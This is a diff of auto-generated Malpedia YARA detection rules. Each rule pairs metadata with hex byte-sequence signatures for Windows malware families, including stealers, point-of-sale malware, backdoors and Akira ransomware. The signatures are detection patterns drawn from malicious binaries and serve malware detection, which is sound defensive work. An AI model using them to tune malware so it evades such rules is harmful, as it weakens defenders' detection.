+		malpedia_version = "20230715"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 6a01 6a08 e8???????? 6a03 53 53 }
-		$sequence_1 = { e8???????? 8bf3 8d5c1b02 3b5d0c 7cb6 7526 8b450c }
-		$sequence_2 = { 8d8c24ac000000 8844241b e8???????? 85c0 743a 385c2417 7534 }
-		$sequence_3 = { c3 837c2404ff 750e 817c2408ffffff7f 7504 33c0 40 }
-		$sequence_4 = { c60060 e8???????? 6a5c 8bce c60064 e8???????? 68c5010000 }
-		$sequence_5 = { eb02 33c0 57 50 ff742418 ff742420 ff74241c }
-		$sequence_6 = { c3 56 8bf1 6a00 6a01 8d4e7c c706???????? }
-		$sequence_7 = { e9???????? e8???????? 8b00 50 e8???????? 83c404 50 }
-		$sequence_8 = { c6400d00 8908 eb06 8b4508 832000 e8???????? c20c00 }
-		$sequence_9 = { c1e108 034df0 8d4514 e8???????? 834dfcff 8d4514 50 }
+		$sequence_0 = { 6bd238 8b0c8d187b0410 88441129 8b0b 8bc1 c1f806 }
+		$sequence_1 = { 83c408 8bb5e8fdffff 8dbdd8fdffff 83bdecfdffff10 c745b000000000 0f43bdd8fdffff }
+		$sequence_2 = { 8bf3 6bf938 c1fe06 6a00 8b0cb5187b0410 ff740f24 }
+		$sequence_3 = { 894610 c7461407000000 668906 e9???????? 837f1410 8bcf 7202 }
+		$sequence_4 = { c785e4fbffff07000000 8d5102 668985d0fbffff 6690 668b01 83c102 6685c0 }
+		$sequence_5 = { 8d85e8e7ffff 68???????? 50 ff15???????? 83c410 8d8594e7ffff 50 }
+		$sequence_6 = { 0f1085b0fcffff 0f1100 8bc4 0f108590fcffff 51 0f1100 ff5228 }
+		$sequence_7 = { 83c408 8b95dcfeffff 83fa10 722f 8b8dc8feffff 42 8bc1 }
+		$sequence_8 = { 6a00 68???????? 6802000080 c785c8e7ffff3f000f00 ff15???????? 85c0 0f84ef000000 }
+		$sequence_9 = { 8d45f4 64a300000000 8965f0 8b4510 8b4d18 8b5d0c }
 
 	condition:
-		7 of them and filesize < 4702208
+		7 of them and filesize < 626688
 }
-rule MALPEDIA_Win_Gtpdoor_Auto : FILE
+rule MALPEDIA_Win_Diceloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d10f6aa2-6be7-55e5-960c-d33fee6e5026"
+		id = "e4ad2ec4-b137-51c9-b85d-da5f37acfb45"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gtpdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gtpdoor_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.diceloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.diceloader_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "a4a736e9e4f2e881c8a24f738313b79d8075e540890609147499da030ceac3c8"
+		logic_hash = "1be6b9044c29cb995b59a77fc46c72f3850615efa951d1383ccf2030df818a85"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92018,32 +92175,32 @@ rule MALPEDIA_Win_Gtpdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fb600 31d0 8801 8045fb01 8345fc01 }
-		$sequence_1 = { 0fb600 31d0 8801 8045fb01 }
-		$sequence_2 = { fc b932000000 b800000000 f3aa }
-		$sequence_3 = { 31d0 8801 8045fb01 8345fc01 }
-		$sequence_4 = { 4989c0 be04000000 e8???????? 0fb785acf9ffff 83c020 }
-		$sequence_5 = { 8b45cc 66895002 c7042400000000 e8???????? }
-		$sequence_6 = { 48833d????????00 4889e5 7416 b800000000 4885c0 740c bf???????? }
-		$sequence_7 = { 83e801 03450c 66c7000a20 c6400200 8b450c }
-		$sequence_8 = { 4929c4 49c1fc03 4d85e4 741e 31ed }
-		$sequence_9 = { c9 c3 55 89e5 83ec18 8b450c 8b5514 }
+		$sequence_0 = { 488bcb e8???????? 4c634518 488d4c2420 4c03c3 41ffd0 }
+		$sequence_1 = { ff15???????? 488bd7 488d0d14260000 e8???????? }
+		$sequence_2 = { 8b5710 4c8d054f250000 488b4f08 41b91f000000 e8???????? }
+		$sequence_3 = { 448b07 488d1569000000 8b5f04 488d0d4b1e0000 e8???????? 4885c0 7413 }
+		$sequence_4 = { 0fb6c2 8a13 48c1e804 488b44c430 488941f8 }
+		$sequence_5 = { ff15???????? 488b1e 4885db 7420 488b1b 498bd6 }
+		$sequence_6 = { 440f4fe8 48035d48 418bd5 488d4b30 e8???????? 418bd5 8945e0 }
+		$sequence_7 = { 488dac2450faffff 4881ecb0060000 4c8d3d7b250000 c705????????00000000 }
+		$sequence_8 = { 448b541620 8b5c1624 4c03d2 4803da 4533c9 458d7901 458b02 }
+		$sequence_9 = { 488bda 448bc1 488d1561ffffff 488d0d761d0000 e8???????? }
 
 	condition:
-		7 of them and filesize < 4210688
+		7 of them and filesize < 41984
 }
-rule MALPEDIA_Win_Xbot_Pos_Auto : FILE
+rule MALPEDIA_Win_Pteranodon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "940e14dd-221d-5819-92eb-1310f719add8"
+		id = "72fb35bc-9b29-55b2-a918-b3f0192a8f01"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbot_pos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xbot_pos_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pteranodon_auto.yar#L1-L175"
 		license_url = "N/A"
-		logic_hash = "535bdd8a229ae04e062f9eb15912ae47549a3a824b333a9bb79944aa1215914b"
+		logic_hash = "563c856f09bd2595e0a91450a96a721d247fe131fa027b2937b641124422f09c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92057,32 +92214,38 @@ rule MALPEDIA_Win_Xbot_Pos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c685d3fcffff00 c745fcffffffff 8d4dd0 e8???????? }
-		$sequence_1 = { 6bc230 03048de0465600 b901000000 c1e100 c644082a0a 807dff01 }
-		$sequence_2 = { eb0a c78558fcffff01000000 8a9558fcffff 88959ffdffff }
-		$sequence_3 = { 005f56 4d 005f56 4d 0026 56 4d }
-		$sequence_4 = { e8???????? c685bbfdffff01 c745fcffffffff 8d8da8feffff e8???????? 8a85bbfdffff 52 }
-		$sequence_5 = { 4c 005166 4c 004566 4c 007566 4c }
-		$sequence_6 = { 743e 83ec0c 8bc4 89a5ecfeffff 6a00 50 8d4d0c }
-		$sequence_7 = { 83e13f 6bd130 8b0485e0465600 0fb64c1028 83e140 740f }
-		$sequence_8 = { c68583f9ffff01 eb07 c68583f9ffff00 8a8d83f9ffff 888dcbfbffff 8b45e8 8a8dd7fbffff }
-		$sequence_9 = { e8???????? 83c404 83e03f 6bc830 030cb5e0465600 894de4 eb07 }
+		$sequence_0 = { 83f81d 7cf1 eb07 8b0cc584d70210 894de4 85c9 7455 }
+		$sequence_1 = { 8bcb e8???????? 83c41c 8d85a8f6ffff 50 6802020000 ff15???????? }
+		$sequence_2 = { 6a00 6a00 56 68???????? ff15???????? 56 e8???????? }
+		$sequence_3 = { 8b049de0874300 8b4de0 f644082801 7515 }
+		$sequence_4 = { ff5018 8b5dd0 83e800 7409 83e801 }
+		$sequence_5 = { e8???????? 68???????? 8d95a8f8ffff c645fc12 8d8d60f8ffff }
+		$sequence_6 = { 894df8 8b048de0874300 33c9 41 897df0 }
+		$sequence_7 = { eb0e 6a06 c74634789f4200 59 c6463c00 5f 894e38 }
+		$sequence_8 = { c785fcfeffff6f002e00 c78500ffffff72007500 e8???????? 6800010000 8bf8 }
+		$sequence_9 = { 83c408 83f8ff bbffffffff 0f455d08 eb06 8b4dec }
+		$sequence_10 = { c685d8f8ffff00 e8???????? 8d85d8f8ffff c645fc22 50 }
+		$sequence_11 = { e8???????? 8bc8 83c404 894de8 8b01 }
+		$sequence_12 = { 8b55ec 8d45d8 8b4dd8 83fa10 8b75d4 0f43c1 2bf0 }
+		$sequence_13 = { 663b88e0e60210 740d 83c002 83f814 72ef 33c0 40 }
+		$sequence_14 = { 6a06 6a01 6a02 8b00 }
+		$sequence_15 = { 68???????? 56 ff15???????? 68b0000000 8d853cffffff 6a00 50 }
 
 	condition:
-		7 of them and filesize < 3031040
+		7 of them and filesize < 499712
 }
-rule MALPEDIA_Win_Ramdo_Auto : FILE
+rule MALPEDIA_Win_Blackpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e5dab1d9-452a-5887-a4af-58f6481f5f6c"
+		id = "a3030926-9034-5a42-987b-de9e78e9dde5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramdo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ramdo_auto.yar#L1-L105"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blackpos_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "8755ec08f63d4c02872dc91cf7ac7496e98fc865f5e95d3244691dbde1a5dad8"
+		logic_hash = "c4a32b4f82fccb65e36ace8eee5711333479f2ae865afb2d6f3c995c606d80a9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92096,32 +92259,32 @@ rule MALPEDIA_Win_Ramdo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 68b3030442 6a00 6a00 e8???????? }
-		$sequence_1 = { 68bc882a42 6a03 6a00 e8???????? }
-		$sequence_2 = { 6894dac0dc 6a00 6a00 e8???????? }
-		$sequence_3 = { ff55f8 8945fc 837dfcff 7411 }
-		$sequence_4 = { 68dd786eac 6a03 6a00 e8???????? }
-		$sequence_5 = { 68c07b3072 6a03 6a00 e8???????? }
-		$sequence_6 = { 68b6b2cff5 6a03 6a00 e8???????? }
-		$sequence_7 = { 68b928ece1 6a03 6a00 e8???????? }
-		$sequence_8 = { 68b900308a 6a01 6a00 e8???????? }
-		$sequence_9 = { 68c29e34ea 6a03 6a00 e8???????? }
+		$sequence_0 = { 56 8d85d0fcffff 50 56 ff15???????? }
+		$sequence_1 = { 837e1400 0f8e94010000 83a5f8fffdff00 8b7e08 83661400 }
+		$sequence_2 = { 8d7de0 f3a5 a4 be00020000 }
+		$sequence_3 = { 8365bc00 8365c000 8945b4 8d45b4 50 }
+		$sequence_4 = { 53 50 889db8fcffff e8???????? 57 68???????? }
+		$sequence_5 = { f7f9 8b4dfc 5f 5e 5b 8bc2 }
+		$sequence_6 = { 8a843dfefffdff 3ac1 7211 3c3a }
+		$sequence_7 = { 803e00 7522 8d041f 6a01 8d8405e5fbffff 50 56 }
+		$sequence_8 = { 8bc8 83e01f c1f905 c1e006 03048d60c45800 eb02 8bc2 }
+		$sequence_9 = { 899dbcfaffff c785c0faffffa0bb0d00 c785c4faffff90854100 ffd7 8d85c4faffff 50 }
 
 	condition:
-		7 of them and filesize < 548864
+		7 of them and filesize < 3293184
 }
-rule MALPEDIA_Win_Milkmaid_Auto : FILE
+rule MALPEDIA_Win_Akira_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7da20991-98e0-57dd-8b6d-3afa27d44835"
+		id = "9957fbe0-0809-5ea9-92e6-35285e3e151d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.milkmaid"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.milkmaid_auto.yar#L1-L106"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.akira"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.akira_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "7d1f7f5be2aa6e035c1f331c5b3df828eca6552df1209a5dbc69d5d2d3452b78"
+		logic_hash = "3bec6caf716d6a1efb83aa954ea803db62de6e65cc0a5401d25e2d0c788df4d4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92135,30 +92298,32 @@ rule MALPEDIA_Win_Milkmaid_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4c2414 889c24dc280100 e8???????? 8d4c240c }
-		$sequence_1 = { 8d442408 57 50 e8???????? 83c404 33db 68???????? }
-		$sequence_2 = { 8d4c2408 e8???????? 68???????? 8d4c2408 e8???????? 8b442404 6a00 }
-		$sequence_3 = { 8a8528280100 81e1ff0f0000 33db 84c0 8a5c2918 895c2428 }
-		$sequence_4 = { 50 ff15???????? 8b74241c 8d4c2404 51 8bce }
-		$sequence_5 = { 8d4c240c c78424dc280100ffffffff e8???????? 33c0 8b8c24d4280100 5f }
-		$sequence_6 = { 8b4c240c 50 51 8d8c2480000000 c68424e428010003 e8???????? }
-		$sequence_7 = { 6a00 6a1a 6a00 ff15???????? 6aff 8d4c2408 }
+		$sequence_0 = { 0fb64718 8807 4863c1 48893cc2 e9???????? 0fb64718 8807 }
+		$sequence_1 = { 498d4f18 e8???????? 84c0 742d 498d5718 488d8f18030000 }
+		$sequence_2 = { 6642833c4000 75f5 488d559d 488d8de0080000 e8???????? 90 c645a700 }
+		$sequence_3 = { e9???????? 488d8a20140000 e9???????? 488d8a40140000 e9???????? }
+		$sequence_4 = { ffc3 48ffc0 4883f806 7cee 488bcf e8???????? 488b5c2450 }
+		$sequence_5 = { 4883c108 488b01 48c70100000000 4889442460 bb04000000 4885f6 744e }
+		$sequence_6 = { 0f8456ffffff eb05 4084f6 7407 41c60630 49ffc6 498bd4 }
+		$sequence_7 = { 488bda 4533ed 41f7411800400000 7528 410f1000 0f2945c0 4c8b11 }
+		$sequence_8 = { f00fc181a4000000 83f801 7506 e8???????? 90 488bc3 4883c420 }
+		$sequence_9 = { 48895110 4c8bc7 418bd6 e8???????? 4088341f e9???????? 488bc7 }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 1286144
 }
-rule MALPEDIA_Win_Ravenstealer_Auto : FILE
+rule MALPEDIA_Win_Dnespy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "84f90220-3279-5007-a5a1-8ce5ade31449"
+		id = "99cbf088-6549-56a2-969b-60e6f7eba155"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ravenstealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ravenstealer_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnespy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dnespy_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "79823541f3a380244fa96c3e3bd68dec6432b3566c33a9fa586cf37babf2bf66"
+		logic_hash = "4e1c2bd2efe3fbaf06ba8ff5d9f3d8607a9e5d8c5f87336409321d599b08c5ad"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92171,33 +92336,33 @@ rule MALPEDIA_Win_Ravenstealer_Auto : FILE
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
-	strings:
-		$sequence_0 = { 4c8b742430 4883c438 415f 415c 5f 5b c3 }
-		$sequence_1 = { f20f5cc8 f20f59ca f20f114c2440 e8???????? 440fbef0 e8???????? 0fbed8 }
-		$sequence_2 = { c744247809000000 eb58 448d3c37 0fbe05???????? 4103c7 0fbe0d???????? 33d2 }
-		$sequence_3 = { 8b5c2450 8b742454 3bc1 0f84bb130000 0fb605???????? 0fb605???????? 0fb605???????? }
-		$sequence_4 = { f20f59c8 f2440f2cf1 8b85e01f0000 83c04c f20f2ad0 0fb605???????? 0fbec8 }
-		$sequence_5 = { f2480f2ac0 f20f594590 f20f2cc0 89442428 8b442458 83e86a 660f6ed0 }
-		$sequence_6 = { e8???????? 488bf8 488d9424b0000000 488d8c2450090000 e8???????? 488b18 488d9424b8000000 }
-		$sequence_7 = { 85c0 7416 81a5fc030000fffeffff 488d8d28100000 e8???????? 4883c420 5d }
-		$sequence_8 = { 83f801 750a 488b07 488bcf ff5008 90 4d85f6 }
-		$sequence_9 = { 7406 6683f92f 7504 4883c002 483bd8 7442 0f1f8000000000 }
+	strings:
+		$sequence_0 = { 8b54240c a1???????? 89542414 81faff0f0000 762d 0f1f00 ff774c }
+		$sequence_1 = { 83f80a 0f85e6080000 834608fc 8b55dc 85d2 791b 8bc2 }
+		$sequence_2 = { 894618 837e0cff 7403 ff4e24 8bce e8???????? 8b4e0c }
+		$sequence_3 = { 83f9ff 7245 880a 0facc108 c1e808 884a01 0facc108 }
+		$sequence_4 = { 8975b4 c745b80f000000 c645a400 8d8de8feffff e8???????? 8b531c 83fa10 }
+		$sequence_5 = { 33c9 c645fc02 8b45e4 85c0 0f95c1 8d0c8d04000000 034d10 }
+		$sequence_6 = { e9???????? 6a00 57 53 ff762c 56 e8???????? }
+		$sequence_7 = { 3bc3 7304 8bc3 eb0b 3dffffff3f 0f87ca000000 }
+		$sequence_8 = { 8be8 8bc2 eb16 8b4618 53 ff761c }
+		$sequence_9 = { 6a20 c745e400000000 e8???????? 0f104588 8bc8 c745e400000000 8b45b0 }
 
 	condition:
-		7 of them and filesize < 8337408
+		7 of them and filesize < 794624
 }
-rule MALPEDIA_Win_Advisorsbot_Auto : FILE
+rule MALPEDIA_Win_Zumanek_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "47285543-3eed-5a34-ac06-14b7c71920ba"
+		id = "87aee693-fd24-5045-ad68-bbf967fca577"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.advisorsbot_auto.yar#L1-L155"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zumanek"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zumanek_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "69dc9add5b159b8414559d7edfb0ea4fa61745cf82bdc631ece400efa0729506"
+		logic_hash = "692948458546aa7f1172f720f7a047815fbd39df276c694923c84a71f1135e40"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92211,39 +92376,32 @@ rule MALPEDIA_Win_Advisorsbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bc1 2bc2 d1e8 03c2 c1e808 }
-		$sequence_1 = { 8bc2 33d2 c1e809 f7f1 }
-		$sequence_2 = { 8bc2 33d2 c1e808 f7f1 }
-		$sequence_3 = { b89b01a311 f7e1 2bca d1e9 03ca }
-		$sequence_4 = { b80923ed58 f7e1 8bc1 2bc2 }
-		$sequence_5 = { d1e8 03c2 33d2 c1e809 }
-		$sequence_6 = { 8bc2 c1e809 33d2 f7f1 }
-		$sequence_7 = { d1e9 03ca c1e907 2bc1 }
-		$sequence_8 = { d1e9 03ca c1e909 33c8 }
-		$sequence_9 = { d1e9 03ca 33d2 c1e908 }
-		$sequence_10 = { 8b442408 8b4c2408 33d2 f7f1 }
-		$sequence_11 = { 8bc2 33d2 c1e804 f7f1 }
-		$sequence_12 = { 5e 5d 0fb7c1 5b }
-		$sequence_13 = { 8b442414 8b4c2414 33d2 f7f1 }
-		$sequence_14 = { 668b4c2410 5f 5e 5d }
-		$sequence_15 = { 0fb7c0 0fb7c9 33d2 f7f1 }
-		$sequence_16 = { 0fb7c1 0fb7ca 33d2 f7f1 }
+		$sequence_0 = { fc 81fe382e9330 97 e412 3dd16312c9 103f 0800 }
+		$sequence_1 = { 8802 98 811212242434 48 3c91 4a }
+		$sequence_2 = { 894612 4d 2454 48 5b 91 }
+		$sequence_3 = { 71ef 1a6f35 e30b 5d fc 77f2 f1 }
+		$sequence_4 = { 1dba45e22f 91 7c8b e459 0920 122424 }
+		$sequence_5 = { 386b95 4c 53 196a17 }
+		$sequence_6 = { 4a e8???????? 86b71986f742 06 58 4c 8812 }
+		$sequence_7 = { c101f6 53 32b879629b65 76a2 43 fc }
+		$sequence_8 = { d9c3 ab 5f c50f 9d 54 f233591b }
+		$sequence_9 = { 5a c59cd53a93a658 98 9f f5 6b80e7fa856bb2 55 }
 
 	condition:
-		7 of them and filesize < 434176
+		7 of them and filesize < 58867712
 }
-rule MALPEDIA_Win_Retro_Auto : FILE
+rule MALPEDIA_Win_Lowkey_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d637dc20-27e8-52c5-9acd-7f862f01bb0c"
+		id = "3f77a0d8-5e74-59a7-b36b-5b8da053f1d8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.retro"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.retro_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowkey"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lowkey_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "273926cf1373ebba7c2ee31df8ab1a96a84446d1d934a401daaeed8742274515"
+		logic_hash = "d5431f0409ef1f2ee256c5cdc4b5f0e543f06b3c2bf47f27531adb7ea173b9db"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92257,34 +92415,34 @@ rule MALPEDIA_Win_Retro_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f3ab 498bec 4585e4 0f8e59010000 488b442428 f2440f1005???????? 498db5fc070000 }
-		$sequence_1 = { 4c8b442460 ffc0 4883c108 4883c204 4983c320 4981c100240000 4981c220290000 }
-		$sequence_2 = { 488bd9 e8???????? 85c0 7409 8b430c 4883c420 5b }
-		$sequence_3 = { 488b4f18 4533c0 e8???????? 488b4f20 8981a0120000 488b4720 8b88ec120000 }
-		$sequence_4 = { 664585d2 7964 4983c102 ffce 7852 498b942430560000 418b8c2428560000 }
-		$sequence_5 = { f30f5cd9 f30f108814100000 f30f59c4 f30f59dc f30f114018 f30f119818100000 f30f105810 }
-		$sequence_6 = { 418bd5 488bcb 4869ff90140000 4903ff e8???????? 837b2401 750b }
-		$sequence_7 = { 0f14c0 450f14c0 0f5ac0 410f5ac8 f2410f58c2 f20f5ec8 f20f5ad1 }
-		$sequence_8 = { 83c364 83bfa000000000 740b 488bd6 488bcf e8???????? 4533c9 }
-		$sequence_9 = { f30f114f08 f30f104308 0f2f4708 768e ba01000000 eb89 f30f104304 }
+		$sequence_0 = { 4c8bf2 488d8d70010000 33d2 41b800020000 e8???????? }
+		$sequence_1 = { 83bb7004000002 0f848d010000 83cfff 488d2db7310100 83635000 83632c00 e9???????? }
+		$sequence_2 = { 498bc2 458bf1 48c1f806 488d0df41e0300 4183e23f 4d03f0 }
+		$sequence_3 = { 3b15???????? 7350 488bca 4c8d05c9230300 83e13f 488bc2 }
+		$sequence_4 = { 48898424d0000000 4533c0 488b4708 488bd5 48898424e0000000 }
+		$sequence_5 = { 488b0d???????? 488b5210 488b8900040000 ff15???????? 488b15???????? 4533c0 }
+		$sequence_6 = { 85c0 0f94c3 8bc3 488b4c2478 }
+		$sequence_7 = { 33d2 488bc8 ff15???????? 488d1556260200 }
+		$sequence_8 = { 488bcf e8???????? 488d4df7 e8???????? 488d155cfd0100 488d4df7 e8???????? }
+		$sequence_9 = { 488d15c10d0200 4533c0 48895c2420 488b01 ff5020 488b4c2450 4c8d4de8 }
 
 	condition:
-		7 of them and filesize < 1409024
+		7 of them and filesize < 643072
 }
-rule MALPEDIA_Win_Lookback_Auto : FILE
+rule MALPEDIA_Win_Tidepool_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "85752543-778d-502f-a58c-a2ac64bb54fd"
+		id = "79b9a91d-2f80-54a4-850d-1eac43bf12cc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lookback"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lookback_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tidepool_auto.yar#L1-L262"
 		license_url = "N/A"
-		logic_hash = "d58209e22f4f6576558a613c24f624b5020028fc2870f726763fd240be9135bc"
+		logic_hash = "a70dd848875168b4bad1ed7e445677eb0934ca243a590965d7d194a18350ca55"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -92296,32 +92454,51 @@ rule MALPEDIA_Win_Lookback_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b7c241c 33ed 8b473c 8b443878 03c7 8b5024 }
-		$sequence_1 = { 393d???????? 75af eb24 8b0d???????? }
-		$sequence_2 = { 8b542430 894308 8b442428 83c414 }
-		$sequence_3 = { 8b31 25ff0f0000 03c6 8bf7 }
-		$sequence_4 = { 8b7af8 83c228 03f8 8bc1 c1e902 f3a5 }
-		$sequence_5 = { 668b4b06 3be9 7cd0 5f 5e }
-		$sequence_6 = { 7422 6a00 8d4c2404 6a20 51 6a03 }
-		$sequence_7 = { ff15???????? 8d542400 52 e8???????? 33c0 81c408010000 }
-		$sequence_8 = { 5b 81c410070000 c3 55 8bec 51 53 }
-		$sequence_9 = { 3bef 741b 6800800000 57 }
+		$sequence_0 = { 5f 5e 5b 8b8d00030000 }
+		$sequence_1 = { 8b8d00030000 33cd e8???????? 81c504030000 }
+		$sequence_2 = { 6a00 50 8b08 ff91a4000000 }
+		$sequence_3 = { 8bc6 5e c20400 80790800 c701???????? 740e 8b4904 }
+		$sequence_4 = { 53 6a02 8bf1 e8???????? }
+		$sequence_5 = { 83c40c 803d????????37 7518 68???????? }
+		$sequence_6 = { 6800000040 8d4500 50 ff15???????? }
+		$sequence_7 = { 83e906 51 83c006 50 6a02 }
+		$sequence_8 = { 681f000200 56 68???????? 6801000080 }
+		$sequence_9 = { 5e 5f 5b c9 c3 ff25???????? 51 }
+		$sequence_10 = { e8???????? 68???????? 68???????? 68???????? 8d4500 }
+		$sequence_11 = { 75f9 b8???????? b900000400 c60000 40 49 }
+		$sequence_12 = { 8b08 ff91a4000000 8b4654 6a01 }
+		$sequence_13 = { 8d5658 52 50 ff91d0000000 }
+		$sequence_14 = { 6810270000 ff15???????? 8b45ec 8b08 }
+		$sequence_15 = { 7509 8b4654 50 8b08 ff5138 47 }
+		$sequence_16 = { 40 49 75f9 b8???????? b900000400 }
+		$sequence_17 = { 8d45ec 50 681f000200 53 68???????? }
+		$sequence_18 = { 56 8bf1 e8???????? 8b4654 6a00 }
+		$sequence_19 = { 6802020000 ff15???????? 68???????? ff15???????? 8bf8 }
+		$sequence_20 = { 2bca 33d2 85c9 894c2410 89542414 }
+		$sequence_21 = { 89442424 7e13 51 8d542428 }
+		$sequence_22 = { ff75ec ff15???????? 8b35???????? 6a04 }
+		$sequence_23 = { 53 50 ff75f8 ff75e4 ff75fc ff15???????? }
+		$sequence_24 = { 7504 802000 4b 57 }
+		$sequence_25 = { 59 ff15???????? 8b4df8 8945d8 8b45fc 8d840832010000 }
+		$sequence_26 = { 56 e8???????? 8b7d08 57 e8???????? d1e0 }
+		$sequence_27 = { 895dd4 895dac 895de0 885def 895de8 66ab }
+		$sequence_28 = { 3bf3 7e16 e8???????? 6a1a }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 1998848
 }
-rule MALPEDIA_Win_Winsloader_Auto : FILE
+rule MALPEDIA_Win_Pebbledash_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "191c86a4-a63b-58ad-aa56-a92769922387"
